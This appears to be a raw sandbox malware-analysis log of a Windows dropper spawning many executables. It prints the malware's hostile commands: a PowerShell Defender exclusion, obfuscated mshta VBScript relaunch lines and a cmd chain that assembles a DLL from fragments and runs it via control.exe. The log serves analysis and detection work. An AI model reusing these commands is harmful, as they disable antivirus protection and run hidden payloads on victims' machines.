Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17f45359eb9.exe
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon1785436ae78.exe /mixone
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17948100733a95c58.exe
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon179e1058f256.exe
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon1795d04d4bd.exe
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon178817e243.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe Mon17742f90b916675f2.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe Mon17eac6d534bfd22c7.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe Mon17c604381c7047e.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe Mon17e1fac3fd3d84b.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe Mon17b5f403be4d8d6b.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe Mon17f45359eb9.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe Mon1785436ae78.exe /mixone
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe Mon17948100733a95c58.exe
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe Mon179e1058f256.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe Mon1795d04d4bd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe Mon178817e243.exe
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe | Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\09xU.exE 9xU.EXE -pPtzyIkqLZoCarb5ew
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F -Im "Mon17e1fac3fd3d84b.exe"
Source: C:\Users\user\AppData\Local\Temp\09xU.exE | Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
Source: C:\Users\user\AppData\Local\Temp\09xU.exE | Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" eCHO "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\control.exe control .\R6f7sE.I
Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F -Im "Mon17e1fac3fd3d84b.exe"
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe | Process created: C:\Windows\SysWOW64\mshta.exe "c:\windows\system32\mshta.exe" vbscript: close (createobject ( "wscript.shell" ).run ( "cmd.exe /c copy /y ""c:\users\user\appdata\local\temp\7zs8bd79f65\mon17e1fac3fd3d84b.exe"" 09xu.exe && start 09xu.exe -pptzyikqlzocarb5ew & if """" =="""" for %u in ( ""c:\users\user\appdata\local\temp\7zs8bd79f65\mon17e1fac3fd3d84b.exe"" ) do taskkill /f -im ""%~nxu"" " , 0 , true) )
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c copy /y "c:\users\user\appdata\local\temp\7zs8bd79f65\mon17e1fac3fd3d84b.exe" 09xu.exe && start 09xu.exe -pptzyikqlzocarb5ew & if "" =="" for %u in ( "c:\users\user\appdata\local\temp\7zs8bd79f65\mon17e1fac3fd3d84b.exe" ) do taskkill /f -im "%~nxu"
Source: C:\Users\user\AppData\Local\Temp\09xU.exE | Process created: C:\Windows\SysWOW64\mshta.exe "c:\windows\system32\mshta.exe" vbscript: close (createobject ( "wscript.shell" ).run ( "cmd.exe /c copy /y ""c:\users\user\appdata\local\temp\09xu.exe"" 09xu.exe && start 09xu.exe -pptzyikqlzocarb5ew & if ""-pptzyikqlzocarb5ew "" =="""" for %u in ( ""c:\users\user\appdata\local\temp\09xu.exe"" ) do taskkill /f -im ""%~nxu"" " , 0 , true) )
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c copy /y "c:\users\user\appdata\local\temp\09xu.exe" 09xu.exe && start 09xu.exe -pptzyikqlzocarb5ew & if "-pptzyikqlzocarb5ew " =="" for %u in ( "c:\users\user\appdata\local\temp\09xu.exe" ) do taskkill /f -im "%~nxu"
Source: C:\Users\user\AppData\Local\Temp\09xU.exE | Process created: C:\Windows\SysWOW64\mshta.exe "c:\windows\system32\mshta.exe" vbscript: close ( createobject ( "wscript.shell" ). run ( "cmd.exe /q /r echo | set /p = ""mz"" > scmeap.su & copy /b /y scmeap.su + 20l2vno.2 + guvil5.sch + 7tcinejp.0 + ykifdqa.1 r6f7se.i & start control .\r6f7se.i " , 0 ,true ) )
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /q /r echo | set /p = "mz" > scmeap.su &copy /b /y scmeap.su + 20l2vno.2 + guvil5.sch + 7tcinejp.0 + ykifdqa.1 r6f7se.i& start control .\r6f7se.i
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe | Process created: C:\Windows\SysWOW64\mshta.exe "c:\windows\system32\mshta.exe" vbscript: close (createobject ( "wscript.shell" ).run ( "cmd.exe /c copy /y ""c:\users\user\appdata\local\temp\7zs8bd79f65\mon17e1fac3fd3d84b.exe"" 09xu.exe && start 09xu.exe -pptzyikqlzocarb5ew & if """" =="""" for %u in ( ""c:\users\user\appdata\local\temp\7zs8bd79f65\mon17e1fac3fd3d84b.exe"" ) do taskkill /f -im ""%~nxu"" " , 0 , true) )
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c copy /y "c:\users\user\appdata\local\temp\7zs8bd79f65\mon17e1fac3fd3d84b.exe" 09xu.exe && start 09xu.exe -pptzyikqlzocarb5ew & if "" =="" for %u in ( "c:\users\user\appdata\local\temp\7zs8bd79f65\mon17e1fac3fd3d84b.exe" ) do taskkill /f -im "%~nxu"
Source: C:\Users\user\AppData\Local\Temp\09xU.exE | Process created: C:\Windows\SysWOW64\mshta.exe "c:\windows\system32\mshta.exe" vbscript: close (createobject ( "wscript.shell" ).run ( "cmd.exe /c copy /y ""c:\users\user\appdata\local\temp\09xu.exe"" 09xu.exe && start 09xu.exe -pptzyikqlzocarb5ew & if ""-pptzyikqlzocarb5ew "" =="""" for %u in ( ""c:\users\user\appdata\local\temp\09xu.exe"" ) do taskkill /f -im ""%~nxu"" " , 0 , true) )
Source: C:\Users\user\AppData\Local\Temp\09xU.exE | Process created: C:\Windows\SysWOW64\mshta.exe "c:\windows\system32\mshta.exe" vbscript: close ( createobject ( "wscript.shell" ). run ( "cmd.exe /q /r echo | set /p = ""mz"" > scmeap.su & copy /b /y scmeap.su + 20l2vno.2 + guvil5.sch + 7tcinejp.0 + ykifdqa.1 r6f7se.i & start control .\r6f7se.i " , 0 ,true ) )
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c copy /y "c:\users\user\appdata\local\temp\09xu.exe" 09xu.exe && start 09xu.exe -pptzyikqlzocarb5ew & if "-pptzyikqlzocarb5ew " =="" for %u in ( "c:\users\user\appdata\local\temp\09xu.exe" ) do taskkill /f -im "%~nxu"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /q /r echo | set /p = "mz" > scmeap.su &copy /b /y scmeap.su + 20l2vno.2 + guvil5.sch + 7tcinejp.0 + ykifdqa.1 r6f7se.i& start control .\r6f7se.i
Source: explorer.exe, 0000002F.00000002.4151503703.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884377347.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4175875048.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000002F.00000002.4151503703.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.1850022100.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000000.1714670479.00000000009EC000.00000002.00000001.01000000.00000013.sdmp, Mon17b5f403be4d8d6b.exe.1.dr | Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWndhwndIF29F85E0-4FF9-1068-AB91-08002B27B3D9
Source: explorer.exe, 0000002F.00000000.1849323092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4147635589.0000000001248000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman$
Source: explorer.exe, 0000002F.00000002.4151503703.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.1850022100.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 0000002F.00000002.4151503703.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.1850022100.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 2_2_00475010 cpuid 2_2_00475010
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,19_2_00007FF72F6BAFA0
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_00007FF72F6BB9D4
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: try_get_function,GetLocaleInfoW,19_2_00007FF72F6B0734
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_00007FF72F6BB7F8
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: EnumSystemLocalesW,19_2_00007FF72F6BB3BC
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: EnumSystemLocalesW,19_2_00007FF72F6BB2EC
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: EnumSystemLocalesW,19_2_00007FF72F6B0164
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
